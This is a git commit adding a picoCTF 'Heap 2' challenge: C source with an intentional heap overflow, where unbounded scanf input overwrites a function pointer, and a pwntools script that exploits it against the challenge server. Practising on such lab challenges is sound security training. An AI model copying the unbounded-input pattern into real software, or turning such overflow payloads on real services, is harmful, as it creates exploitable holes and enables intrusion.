Heap 2
This commit is contained in:
Maxime Vorwerk
BIN
heap_2/chall
Executable file
BIN
heap_2/chall
Executable file
Binary file not shown.
92
heap_2/chall.c
Executable file
92
heap_2/chall.c
Executable file
@@ -0,0 +1,92 @@
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#define FLAGSIZE_MAX 64
|
||||
|
||||
int num_allocs;
|
||||
char *x;
|
||||
char *input_data;
|
||||
|
||||
void win() {
|
||||
// Print flag
|
||||
char buf[FLAGSIZE_MAX];
|
||||
FILE *fd = fopen("flag.txt", "r");
|
||||
fgets(buf, FLAGSIZE_MAX, fd);
|
||||
printf("%s\n", buf);
|
||||
fflush(stdout);
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void check_win() { ((void (*)())*(int*)x)(); }
|
||||
|
||||
void print_menu() {
|
||||
printf("\n1. Print Heap\n2. Write to buffer\n3. Print x\n4. Print Flag\n5. "
|
||||
"Exit\n\nEnter your choice: ");
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
void init() {
|
||||
|
||||
printf("\nI have a function, I sometimes like to call it, maybe you should change it\n");
|
||||
fflush(stdout);
|
||||
|
||||
input_data = malloc(5);
|
||||
strncpy(input_data, "pico", 5);
|
||||
x = malloc(5);
|
||||
strncpy(x, "bico", 5);
|
||||
}
|
||||
|
||||
void write_buffer() {
|
||||
printf("Data for buffer: ");
|
||||
fflush(stdout);
|
||||
scanf("%s", input_data);
|
||||
}
|
||||
|
||||
void print_heap() {
|
||||
printf("[*] Address -> Value \n");
|
||||
printf("+-------------+-----------+\n");
|
||||
printf("[*] %p -> %s\n", input_data, input_data);
|
||||
printf("+-------------+-----------+\n");
|
||||
printf("[*] %p -> %s\n", x, x);
|
||||
fflush(stdout);
|
||||
}
|
||||
|
||||
int main(void) {
|
||||
|
||||
// Setup
|
||||
init();
|
||||
|
||||
int choice;
|
||||
|
||||
while (1) {
|
||||
print_menu();
|
||||
if (scanf("%d", &choice) != 1) exit(0);
|
||||
|
||||
switch (choice) {
|
||||
case 1:
|
||||
// print heap
|
||||
print_heap();
|
||||
break;
|
||||
case 2:
|
||||
write_buffer();
|
||||
break;
|
||||
case 3:
|
||||
// print x
|
||||
printf("\n\nx = %s\n\n", x);
|
||||
fflush(stdout);
|
||||
break;
|
||||
case 4:
|
||||
// Check for win condition
|
||||
check_win();
|
||||
break;
|
||||
case 5:
|
||||
// exit
|
||||
return 0;
|
||||
default:
|
||||
printf("Invalid choice\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
}
|
||||
}
|
||||
15
heap_2/sol.py
Executable file
15
heap_2/sol.py
Executable file
@@ -0,0 +1,15 @@
|
||||
#!/home/maxime/.pyvenv/bin/python3
|
||||
from pwn import *
|
||||
|
||||
conn = connect("mimas.picoctf.net", 51447)
|
||||
|
||||
conn.recvuntil(b':')
|
||||
|
||||
conn.sendline(b'2')
|
||||
|
||||
conn.recvuntil(b':')
|
||||
|
||||
conn.sendline(b'0' * 32 + b'\xa0\x11\x40')
|
||||
|
||||
conn.interactive()
|
||||
|
||||
Reference in New Issue
Block a user